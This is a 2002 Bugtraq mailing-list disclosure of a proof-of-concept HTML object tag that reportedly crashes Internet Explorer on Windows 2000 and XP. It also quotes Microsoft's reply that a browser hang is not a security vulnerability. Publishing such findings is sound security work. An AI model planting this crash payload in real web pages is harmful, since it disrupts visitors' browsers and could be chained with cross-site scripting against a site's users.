Bugtraq mailing list archives

A DoS against IE in W2K and XP? You Make the Call...

From: "'ken'@FTU" <ken_at_ftu () yahoo com>
Date: Mon, 24 Jun 2002 22:31:04 -0400

The following line of code will crash IE when the OS is Windows 2000 or Windows XP.

<!--  start dosIE-doe.html -->

<object ID="dosIE-doe" CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->

I alerted Microsoft. They replied that it is not a security vulnerability according to their policy:

================= Begin MS reply ========================

"Suppose a flaw in a web browser could be misused by a web site to
"hang" the browser of any user who visited the site. If the user were
able to resume normal operation by stopping the browser, restarting it,
and avoiding the attacker's web site in the future, the flaw would not
constitute a security vulnerability."
(For the complete definition of a security vulnerability please see
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp)

I am aware that this code is more an inconvenience that anything else. Although, if it were combined with another vulnerability its effect may be much worse. (Say a XSS vulnerability also exists and an attacker could crash the browser of every user that visits your ecommerce site...)

'ken'@FTU

--
"I grew convinced that truth, sincerity and integrity in dealings between man and man were of the utmost importance to the felicity of life, and I formed a written resolution to practice them ever while I lived."
        -Benjamin Franklin, The Autobiography of Benjamin Franklin